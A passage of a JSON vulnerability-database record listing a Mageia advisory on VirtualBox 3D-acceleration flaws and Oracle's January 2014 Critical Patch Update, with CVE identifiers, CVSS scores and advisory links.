"CVE-2014-0406", "CVE-2014-0407"], "modified": "2014-01-20T00:00:00", "id": "GLSA-201401-13", "href": "https://security.gentoo.org/glsa/201401-13", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Multiple vulnerabilities in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.20, and 4.3.4 allows local users to affect integrity and availability via unknown vectors related to Core (CVE-2013-5892, CVE-2014-0404, CVE-2014-0405, CVE-2014-0406, CVE-2014-0407). 
VBox/GuestHost/OpenGL/util/net.c in Oracle VirtualBox before 3.2.22, 4.0.x before 4.0.24, 4.1.x before 4.1.32, 4.2.x before 4.2.24, and 4.3.x before 4.3.8, when using 3D Acceleration, allows local guest OS users to execute arbitrary code on the Chromium server via a crafted Chromium network pointer in a CR_MESSAGE_READBACK or CR_MESSAGE_WRITEBACK message to the VBoxSharedCrOpenGL service, which triggers an arbitrary pointer dereference and memory corruption (CVE-2014-0981). Multiple array index errors in programs that are automatically generated by VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py in Oracle VirtualBox 4.2.x through 4.2.20 and 4.3.x before 4.3.8, when using 3D Acceleration, allow local guest OS users to execute arbitrary code on the Chromium server via certain CR_MESSAGE_OPCODES messages with a crafted index, which are not properly handled (CVE-2014-0983). The virtualbox packages have been updated to the 4.3.10 maintenance release, which resolves these issues and other upstream reported issues (for more info check the referenced changelog). 
This update also resolves the following: \\- load virtualbox modules on install (mga#8826) \\- missing GUI translations (mga#12578) \n", "cvss3": {}, "published": "2014-04-20T18:48:47", "type": "mageia", "title": "Updated virtualbox packages fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5892", "CVE-2014-0404", "CVE-2014-0405", "CVE-2014-0406", "CVE-2014-0407", "CVE-2014-0981", "CVE-2014-0983"], "modified": "2014-04-20T18:48:47", "id": "MGASA-2014-0184", "href": "https://advisories.mageia.org/MGASA-2014-0184.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2021-06-08T18:59:32", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. 
Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** This Critical Patch Update contains 144 new security fixes across the product families listed below.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - January 2014", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0371", "CVE-2012-3544", "CVE-2014-0400", "CVE-2013-5879", "CVE-2013-5876", "CVE-2013-5889", "CVE-2013-2248", "CVE-2013-5909", "CVE-2007-0008", "CVE-2014-0392", "CVE-2013-5873", "CVE-2013-5858", "CVE-2014-0405", "CVE-2013-5860", "CVE-2014-0367", "CVE-2014-0385", "CVE-2013-5878", "CVE-2006-0999", "CVE-2014-0410", "CVE-2012-4558", "CVE-2014-0398", "CVE-2013-5897", "CVE-2013-2071", "CVE-2014-0404", "CVE-2014-0415", "CVE-2014-0434", "CVE-2013-5884", "CVE-2014-0435", "CVE-2014-0443", "CVE-2013-5870", "CVE-2014-0390", "CVE-2013-5905", "CVE-2013-5880", "CVE-2013-5904", "CVE-2014-0391", "CVE-2013-5888", "CVE-2013-5893", "CVE-2014-0387", "CVE-2013-2251", "CVE-2014-0393", "CVE-2014-0399", "CVE-2012-4605", "CVE-2013-5821", "CVE-2014-0431", "CVE-2013-5898", "CVE-2014-0427", "CVE-2014-0441", "CVE-2013-5900", "CVE-2013-1654", "CVE-2014-0433", "CVE-2014-0375", "CVE-2013-5886", "CVE-2014-0401", "CVE-2014-0396", "CVE-2014-0406", "CVE-2013-5872", "CVE-2014-0440", "CVE-2014-0425", "CVE-2013-5883", "CVE-2013-1862", "CVE-2013-5834", "CVE-2014-0418", "CVE-2014-0373", "CVE-2013-5877", "CVE-2013-5874", 
"CVE-2014-0439", "CVE-2014-0394", "CVE-2013-5887", "CVE-2014-0408", "CVE-2014-0376", "CVE-2014-0422", "CVE-2014-0419", "CVE-2014-0411", "CVE-2014-0369", "CVE-2014-0366", "CVE-2013-5882", "CVE-2013-5895", "CVE-2003-1067", "CVE-2014-0437", "CVE-2013-5885", "CVE-2013-5901", "CVE-2013-5881", "CVE-2013-2067", "CVE-2014-0389", "CVE-2014-0388", "CVE-2013-5899", "CVE-2014-0412", "CVE-2013-5896", "CVE-2013-3830", "CVE-2014-0417", "CVE-2014-0372", "CVE-2014-0407", "CVE-2013-5910", "CVE-2013-5906", "CVE-2014-0428", "CVE-2013-5891", "CVE-2014-0382", "CVE-2014-0370", "CVE-2013-5808", "CVE-2006-0998", "CVE-2013-2134", "CVE-2013-5871", "CVE-2014-0402", "CVE-2013-2924", "CVE-2013-4310", "CVE-2014-0368", "CVE-2014-0420", "CVE-2013-5853", "CVE-2014-0423", "CVE-2013-2135", "CVE-2013-5868", "CVE-2014-0430", "CVE-2014-0374", "CVE-2013-5875", "CVE-2013-5869", "CVE-2013-5907", "CVE-2014-0377", "CVE-2012-3499", "CVE-2013-5902", "CVE-2013-5894", "CVE-2013-5795", "CVE-2007-0009", "CVE-2013-5892", "CVE-2014-0381", "CVE-2014-0383", "CVE-2014-0424", "CVE-2014-0395", "CVE-2013-4316", "CVE-2014-0379", "CVE-2014-0403", "CVE-2013-5908", "CVE-2014-0386", "CVE-2007-1858", "CVE-2013-5785", "CVE-2014-0445", "CVE-2013-5764", "CVE-2014-0444", "CVE-2014-0378", "CVE-2013-5833", "CVE-2013-1620", "CVE-2013-5890", "CVE-2014-0416", "CVE-2014-0380", "CVE-2014-0438"], "modified": "2014-01-14T00:00:00", "id": "ORACLE:CPUJAN2014-1972949", "href": "https://www.oracle.com/security-alerts/cpujan2014.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}